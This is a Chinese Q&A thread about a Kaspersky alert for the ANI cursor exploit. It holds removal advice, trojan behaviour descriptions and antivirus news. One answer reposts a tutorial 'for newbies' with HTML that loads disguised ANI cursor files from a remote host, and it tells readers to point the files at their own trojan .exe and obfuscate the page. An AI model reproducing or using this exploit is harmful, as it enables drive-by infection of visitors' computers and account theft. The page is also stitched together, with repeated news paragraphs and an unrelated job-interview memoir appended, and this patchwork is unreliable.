卡巴斯基检测出这个，我该怎么办？不用管他么？

Posted 2023-04-23

文件: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\8PYROP2R\t[1].js 已检测新变种 恶意程序 Exploit.Win32.IMG-ANI.gen
都没有处理这一项，只有放弃，和转到信任区
一楼的方法没法，说是正被另一个程序使用

属恶意木马。win32.troj系列，其实是木马系列的病毒，一般是被引导安装的，如比较出名的Win32.Troj.QQPASS××××、Win32.Troj.newsuper.××××都是这个系列的。“狩猎者”变种（Win32.Troj.QQpass.ak.29696）即是其中之一。
传播方式：被人恶意引导安装病毒程序/利用IE漏洞传播

感染系统：Win9x/WinMe/WinNT/Win2K/WinXP/Win2003

该病毒通过QQ发送一些很具有欺骗性的网站链接，如“ http://nicex,9126,com 快来，我刚注册的同学录!”，诱骗对方点击链接，在点击链接后利用未打补丁的IE的隐藏框架漏洞自动下载运行病毒。它还会释放传奇木马，该木马会试图偷传奇等游戏的密码,发送到指定的信箱中。其主要特点如下：

1、A.安装自身到％Temp％中,文件名为"main.exe";
B.复制多份病毒体到％System％中，文件名为："SYSTARY.EXE","sysnot.exe","更新r.exe";
C.释放另一个传奇木马到％System％中，名为"INTRENAT.EXE","mm.exe","WinSocks.dll",还有一份复制到％SystemRoot％中，名为:"intrenat.exe";

2、在注册表的主键：
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
中添加如下键值："Intrenat"="％SystemRoot％intrenat.exe"
在注册表的主键：
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunSerives
中添加如下键值："Intrenat"="％SystemRoot％intrenat.exe"
"windows 更新"="％System％\\更新r.exe"

3、在"System.ini"的[boot]节中设置：shell=Explorer.exe ％System％systary.exe

4、修改.txt文件的关联——在注册表的主键：
HKEY_CLASS_ROOT\\txtfile\\shell\\open\\command
修改如下键值："默认="％System％SYSNOT.EXE "％1"

5、释放出来的木马会试图偷传奇等游戏的密码,发送到指定的信箱中

【手工清除方法】：
1、进入安全模式或者结束病毒进程：Windows 95/98/Me: 重新启动计算机，并进入安全模式。
Windows NT/2000/XP/2003: 打开进程管理器，找到名为“intrenat.exe”的进程，并将其结束（也许还有别的可疑程序，要一并去掉。如果你不能确知哪些程序可疑，那么就结束掉所有不是系统自带的程序。因为很多木马都有两个程序存在在电脑中，每次启动是自动运行）。

2、彻底杀毒。杀毒的时候有三个地方要注意。第一，必须断网杀毒，就是说不要连上网络。第二，要所有硬盘都杀一遍，不要只查杀C盘。第三，要用对付木马win32.troj系列的专杀工具杀。

3、清理注册表：
打开注册表（regedit），查找主键HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run和
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Runservice
察看此二键下是否有可疑的键。如有，则删除。

如在注册表中发现不了可疑点，或不愿清理注册表，可以运行msconfig，进入点击启动，把启动下文件全部关闭（即把括号内勾勾全部消掉），此时系统会重新提示启动，点击确定。尔后重启计算机。一切ok！

3、删除病毒文件：删除相应目录下的病毒产生的文件。 参考技术A 我用过卡巴斯基一点都不好用，选择跳过就会进入病毒。选择删除就会影响其他程序的使用，还有一个办法就是你的用的应用软件都必须是正版的，要不你就我建议你换一个杀毒软件。 参考技术B 在重启电脑的时候`不停按F8~`之后选安全模式``
进去后`打开卡巴`扫描电脑` 参考技术C 重启电脑按F8进入安全模式，然后杀毒，记得要断网，进入 C:\Documents and Settings\Administrator\Local Settings\Temp，全选，把里面的东西都删掉，因为没什么用的。然后开始－运行－regedit打开注册表，点我的电脑－编辑－查找，把检测到的名字输入查找到的都删除应该就可以了。 参考技术D 你的是ANI病毒。利用微软光标漏洞传播，检测的病毒所在路径是 C盘临时文件夹C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files

可以手动删除此目录下所有文件，或按

回答者：草摩伶 - 魔法师 四级 的方法！

下边是病毒介绍：

http://www.pconline.com.cn/pcedu/soft/virus/safe/0704/993437.html

http://www.pconline.com.cn/pcedu/soft/virus/safe/0704/992083.html

http://tech.sina.com.cn/i/2007-04-06/16451453242.shtml

http://news.ccidnet.com/art/1032/20070403/1051869_1.html

ani蠕虫病毒
ani蠕虫病毒与“熊猫烧香”非常相似的高危病毒，命名为“ANI蠕虫（Worm.DlOnlineGames.a）”。

该病毒不光传播和危害方式与“熊猫烧香”病毒非常相似，还利用了上周末才刚出现的Vista、XP等操作系统的ANI高危漏洞。根据瑞星客户服务中心的统计，短短24小时内，已接到大量用户的求助。鉴于该病毒可能会广泛传播并且危害较为严重，瑞星发出今年第一个“橙色安全警报”（二级）。

瑞星反病毒专家分析，被“ANI蠕虫”感染的电脑会从网上下载多种木马(木马查杀软件下载)、后门病毒，使得用户游戏等账号被盗，或者电脑变成被黑客控制的“肉鸡”。同时，染毒电脑还会发出大量带毒邮件，邮件的题目是：“你和谁视频的时候被拍下的？给你笑死了！”邮件内容为“看你那小样！我看你是出名了！你看这个地址！你的脸拍的那么清楚！你变明星了！http://****.microfsot.com/***/134952.htm”，收到邮件的用户点击这个网址就会被感染。

病毒作者使用国内某网站的邮箱散发病毒，并且邮件内容也为中文，因此基本可以确定该病毒为国人编写。此外，该病毒跟“熊猫烧香”病毒一样，也会感染网页文件并加入病毒代码。如果网站编辑的计算机被该病毒感染，将网页文件上传到网站，那么访问该网站用户就会被感染。

更为严重的是，“熊猫烧香”利用的是老的系统漏洞，用户安装好系统补丁就可防范；而“ANI蠕虫”病毒则采用了上周才被发现的ANI漏洞进行传播，该漏洞存在于Windows Vista、XP等主流操作系统中，目前微软还没有提供补丁程序。

针对此恶性病毒，瑞星杀毒软件已经升级，19.16.60版本以上即可对其进行彻底查杀。瑞星安全专家提醒广大用户，除了升级杀毒软件、打开实时监控以外，上网时还应该打开个人防火墙，阻止病毒自动下载恶意程序。

ani网马生成器

1、病毒作者制作恶意ANI文件，使其能下载其它的病毒或木马程序；

2、病毒作者会将ANI文件更名为Jpeg、Bmp、Gif等常见图片文件放到网页中；

3、当用户利用IE浏览器访问这些网页时会自动将该ANI文件下载到本地；

4、IE浏览器在打开该ANI文件时，即可触发漏洞，并立即下载和执行其它的病毒或木马程序。

目前微软尚未公布ani漏洞的处理办法，请各位电脑用户这段时间避免进入一些陌生网站！

这个漏洞是Microsoft Windows Cursor and Icon Format Remote Code Execution (0day) 为了方便广大菜鸟 特发出此漏洞的代码和使用方法！以下就是了～

代码没有经过加密，所以大家需要自行加密了，加密很简单把这段代码用ASCII字符替换就行了！“测试文件.htm”代码如下：
（使用记事本打开编辑即可）
将这段代码：

[Copy to clipboard]CODE:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=big5">
<META content="MSHTML 6.00.2900.3059" name=GENERATOR></HEAD>
<BODY>
<DIV style="CURSOR: url('http://www.exediy.cn/a.jpg';)">
<DIV
style="CURSOR: url('http://www.exediy.cn/b.jpg';)"></DIV></DIV></BODY></HTML>

先把那两个“http://www.exediy.cn/”改为你的FTP空间地址，就是你上传a.jpg 和b.jpg 文件的地址，然后用ASCII代码加密，加密然后复制－－粘贴，替换掉原来的相应代码就行了－－保存。

剩下需要更改的就是 a.jpg和b.jpg 这两个文件，大家用“记事本”分别打开这两个JPG文件，然后可以看到最后面为“http://www.exediy.cn/a.exe” 这两个文件后面都是这个地址，现在大家可以把这个地址替换掉！比如你的木马地址为“http://www.xxx.com/163.exe” 我们就将这两个文件中的地址都替换为“http://www.xxx.com/163.exe”
替换后如下：

[Copy to clipboard]CODE:
RIFF ACONanih$ $
============================================================================================================
更为严重的是，“熊猫烧香”利用的是老的系统漏洞，用户安装好系统补丁就可防范；而“ANI蠕虫”病毒则采用了上周才被发现的ANI漏洞进行传播，该漏洞存在于Windows Vista、XP等主流操作系统中，目前微软还没有提供补丁程序。

针对此恶性病毒，瑞星杀毒软件已经升级，19.16.60版本以上即可对其进行彻底查杀。瑞星安全专家提醒广大用户，除了升级杀毒软件、打开实时监控以外，上网时还应该打开个人防火墙，阻止病毒自动下载恶意程序。

瑞星安全专家指出，该漏洞影响WindowsXP以上操作系统和IE6以上浏览器，微软最新Vista和IE7都不能幸免。这是Vista第一次爆出重大漏洞，“利用该漏洞传播病毒的网站正逐步增多，攻击代码很可能已公开”。

安全厂家提醒，普通网民不要轻易登陆陌生网站，尤其是通过电子邮件、聊天软件等发来的陌生网址；网站管理员则应加强对服务器日志管理，尤其要注意不明来源ANI及JPG等格式图片文件。此外，电脑用户应及时升级杀毒软件，上网时打开杀毒软件实时监控。 第5个回答  2007-05-01 点处理啊，然后删除！

从苏宁电器到卡巴斯基第36篇：我与卡巴斯基的邂逅（下）（大结局）

卡巴斯基的二面

       第二天下午我准时来到了卡巴斯基，也是终于获得了进入公司的机会。和前台说明来意，就让我先在休息区等候。其实IT类企业的硬件条件还是不错的，有专门的休息区，和工作区是分开的，大、中、小会议室也都是很齐备，墙上还贴有企业活动的照片，人文气息也是很浓的，这就与我一路走来所经历的公司是完全不同的了。总之，进入卡巴斯基以后，我对公司的第一印象是非常好的，就想赖在这里不走了。

       过了一会，病毒分析部的主管就带着笔记本电脑过来了，把我带到了一个小会议室，一会就在这里和俄罗斯那边的同事进行电话面试。这也是我第一次遇见真的病毒分析师，心情甚至比来到卡巴斯基还要激动。尽管他对我的面试已经结束了，但我还是主动问了很多我之前很关心的技术问题。主管对于我的疑问也是对答如流，可惜的是一些较深的知识，比如涉及到算法了，我也听不懂，但总体上还是了解到了不少东西。

       

       很快，我们就和俄罗斯那边建立视频连接了，首先是总部的HR对我进行面试。之前通过网上别人的面经，我知道如果面试官不是技术人员，那我就没必要提及过多的技术层面的话题。一开始的自我介绍，我觉得自己讲得还算不错，口语还算是标准，毕竟也很简单。可是接下来的问答部分，我就开始慌了，对话毕竟是我的弱项，尽管聊的东西很简单（我个人的一些看法和个人经历之类），但也比在苏宁的时候复杂多了。还好HR也没问我多少问题，估计也是觉得我们双方的对话，都是在各说各的，也问不出什么了，最后问我有没有什么想问的。说实话，我什么都不想问。如果是技术问题的话，确实有很多东西想知道，但是和俄罗斯的HR确实没什么好聊的，可是面经上建议说还是问点问题比较好，于是我问了一个关于我们职位升迁的问题。

       接下来是俄罗斯那边的技术面，是由一位在卡巴斯基也算是老资格的一位安全工程师来负责。其实对于这样的面试，我最怕的还是听不清听不懂，因为受限于网络环境，杂音是免不了的，加上再受一些口音的影响，所以整个面试中，我的压力还是挺大的。面试的问题也是由浅入深，最开始考查的是基本的汇编知识，就是他写了一段汇编代码，让我判断结果是什么。其实他写的代码还是比较具有迷惑性的，尽管汇编对于我来说也是非常熟悉了，可是对于汇编的一些小技巧以及一些花招，我还是欠缺火候的。因此当时我仅仅凭感觉说了一个答案，也不知道对不对，算是出师不利了。

       之后的问题更多的是围绕着我研究过的东西来展开的了。比如我跟面试官讲，我分析过 “熊猫烧香”，并且把大致的分析流程说了一下，最后还说为了对抗这种病毒，我还专门写了一个专杀工具。结果面试官似乎是找到了突破口，让我讲讲“熊猫烧香”是如何感染文件，以及我的专杀工具是怎么解除感染的。这可真是 “屋漏偏逢连夜雨，船破恰遇顶头风”，我直到今天，也没把“熊猫烧香”分析完全，它的感染原理我压根儿就没仔细研究过，而我的专杀工具也去除不了感染。之前的汇编问题我回答得已经很不好了，要是这里我再说自己没好好研究过，那可就尴尬了。幸好我之前大概了解过“熊猫烧香”的感染方式，知道它会拿PE文件中的资源部分做文章，所以我就添油加醋地把这段展开来扯了很多。连我自己都对自己的回答不满意，面试官作为一个资深安全工程师，估计也是能看出来的。也许他也觉得在“熊猫烧香”的问题上问不出什么了吧，就问我如果遇到一个新的病毒，我需要花多久的时间才能写出一个专杀工具。当时我的想法是，由于我的博客中专门讨论过非感染型病毒的专杀工具的写法，而病毒的破坏方式其实基本就是那么几种，即便是遇到新的病毒，那么写专杀工具的时候只要根据当前病毒的特点，把之前的代码拿过来修改一下就可以了。所以我就直接说大概两个小时就够用了吧。我还说如果是感染型的病毒，那么这个时间就不好说了。之后他跟我讲，如果是他的话，他会回答需要一周的时间。

       其实这件事让我感触很深，时至今日依然记忆犹新。因为我以为他的本意是想看看我分析病毒并且写专杀工具的速度快不快，因此我也是把时间往短了说的，生怕把时间说长了会给他留下我水平不行的印象（我也确实很菜）。但没想到他却很实在，是真的想知道我的处理时间，因此回答一个比较保守的时间长度才是最好的答案。是我把事情想复杂了。

       接下来他还问了我一些算法的问题，主要是大文件的处理。也就是比如给你一个2GB大小的txt文件，如何快速实现查找等操作。其实这种问题也常常出现在国内的IT企业面试中，我从我同学那里也是有所耳闻。但是他们当时也并不知道应该怎么处理。没想到我来到卡巴斯基应聘病毒分析师，也会遇到算法问题，我这种算法白痴也就只能回答不知道了。但是也不能明说，而是尝试性地讲，要不先把这个文件分成几个部分，再进行进一步的操作？

       以上我举的是我没回答好的问题，我自己都对自己不满意。但是有些比较基础的问题，我还是回答的不错的。比如比较经典的，进程和线程有什么区别啊？通过什么函数可以创建进程啊？等等。我们隔着屏幕，说着都不是自己母语的语言，我也很难看出他内心的想法，究竟对我满不满意。最后，又轮到我问问题的时间了。这次由于他是技术人员，因此我想知道的事情还是挺多的。比如他来卡巴斯基多久了，病毒分析师的晋升是怎样的，他平时都去什么网站学习技术等等。其实经过俄罗斯同事的这两轮面试，让我觉得最后的这个提问环节真的是只要按照自己的想法来就好，不想问就不问，完全没必要强迫自己问问题，展现真实的自己就好了。

       当我问完问题以后，他让我去分析一个病毒。那么面试部分也就结束了。北京这边的主管给了我一个样本，让我使用IDA作为分析工具，也允许我上网查资料。其实那个时候我有点手生，好几个月没用过IDA分析病毒了，基本的快捷键都忘了。尽管当时给我的那个样本很简单，但我也是费了半天劲才弄清楚它的行为，写了简要的分析报告。至此，也就结束了卡巴斯基的二面。

       提交完报告以后，我还是挺失落的，我知道自己没发挥好（但也就这水平了），可是却又无可奈何。天也黑了，默默地离开，不知道还能不能回来了。

 

最终，尘埃落定

       大概过了不到一周的时间吧，竟然接到了卡巴斯基人事经理的电话（之前一直以为自己被刷下来了），这也算是最终的电话面试了。这次的面试主要是了解一下我的基本信息以及过往的经历，聊得也是很轻松。最后跟我说要将我的情况上报给总部，然后就等着走流程了，大概也得几周的时间吧。虽然还是需要等，但是我这次已经真切地感觉到卡巴斯基在向我招手了。但是没到最后一刻，还不能轻言成功，还是不能高兴得太早了。但至少，之前在亲戚面前吹的牛，也不必收回了。结果仅过了三四天，人事经理就直接通知我去办入职手续了。

       

       终于，尘埃落定，确定了人生中的另一件大事。办入职手续那天，我也是很准时地来到了公司。由于我还没有毕业，因此暂时只能签在校实习生合同（不影响待遇），同时又签署了正式合同，在我毕业后生效（准确来讲是7月份生效）。那么未来的这几年，我就将自己卖给了卡巴斯基。由于当时我很可能毕不了业，所以我特意问了人事经理，假设我不是硕士，会影响我的待遇吗？经理说并不会，如果是硕士的话，当然更好了。

       经理的这一番话，让我心里有底了。这相当于是给我上了双重保险，一方面是从实习期开始，就可以拿到正式的待遇，另一方面是不论我能不能拿到硕士学位，都不会对我的工作产生影响。这就让我有了底气，我之前一直在说自己已经不在乎能不能毕业了，就是因为这个原因。从这个角度来说，我真的比我的同学要幸福很多了。因为他们的工作是与毕业证挂钩的，新闻里面有时也会看到一些应届生由于种种原因不能毕业，签好的工作就作废了，最终走向极端的事例。卡巴斯基并不介意我的学历，就是想要我这个人，看好我的技术水平，认定我能够做好这份工作，于是就给予了我这两个“特权”，让我特别的有底气。试问，这样的企业，我怎能不珍惜，怎能不对它死心塌地呢？这才是一家真正珍惜人才的企业该做的事情。

       然后，人事经理就把我带到了病毒分析办公室。又一次见到了我的主管，他伸出手来和我握了握手，说：“欢迎来到卡巴斯基”。

       主管和我的那一次握手，开启了我在卡巴斯基的一段崭新的旅程。

 

后记

       曾经，我觉得病毒分析师的职位是那么的遥不可及。也许大家从我之前的故事中，体会到的仅仅是我遭遇的失败的滋味，但是我内心深处的一种很复杂的感受，我自己也不知道如何用语言来准确地表达出来。这里面夹杂有失落、有灰心、不愿放弃却又无可奈何、怀疑自己究竟是不是那块料、不知道自己究竟应该找什么样的工作、生怕成为别人的笑料，等等等等。其中更多的是对于应聘病毒分析师的恐惧以及屡屡受挫的无助。

       面试时也接触过不同公司的反病毒工程师，交流中，我总感觉自己不论是多么努力，也很难达到他们的水平，他们值得我去仰望，我与他们如同两条平行线，可以离的很近，但却永远不可能相交。他们在我心中的高高在上的感觉，确确实实让我心灰意冷。但是，那毕竟只是过去，今天，当我也成为一名病毒分析师，来到了安全领域的时候，赫然发现其实这个职业也不过如此。我似乎可以跳出以前深埋在我心中的怪圈，让我从更加宏观的角度来看待这个职业。

       像我这种半路出家的人，也能够来到卡巴斯基。不论是国内还是国外的安全企业，友商的病毒分析师在我的心中已经丝毫没有了当初的敬畏感。这并不是说我的水平有多高，我也承认自己其实刚刚入门而已。打个比方来说，这件事就如同登山，在山脚下你会觉得自己被群山环绕，是那么的渺小。可是一旦登顶，不论过程中自己是多么的狼狈，摔了多少跟头，最终也都是“会当凌绝顶，一览众山小”。

 

 

       《从苏宁电器到卡巴斯基》系列故事到这里就结束了，几十篇文章蕴含的喜怒哀乐不可胜数，当我每次回顾这些故事的时候，不由得让我想起了那句歌词：

       “雨轻轻弹，朱红色的窗。我一生在纸上，被风吹乱。”

       千秋功过，任人评说，只求努力，问心无愧。从第一篇到最后一篇，时间跨度长达十一年，回首过往，如同昨日，每件事都是那么的熟悉，却又那么的遥远，一去不复返。这看似很漫长的十一年，是我这辈子的一段神奇的旅程，感谢上苍能够给我这样的机会，让我的人生不至于索然无味。这段旅程，也终将被忠实地记录下来。清风不识字，何必乱翻书？人生的喜怒哀乐落于纸上，被风儿吹乱，在我心中却是充满了诗情与画意。前路漫漫，充满挑战，对于未知的一切，我心中充满了好奇，也许在并不久远的未来，会再与大家分享吧。

       最后我想说的是，不论我与卡巴斯基以后会怎样，不论我未来路在何方，我今天能够入职卡巴斯基，成为卡巴斯基实验室的一名病毒分析师，这终将会成为我这辈子永远的骄傲。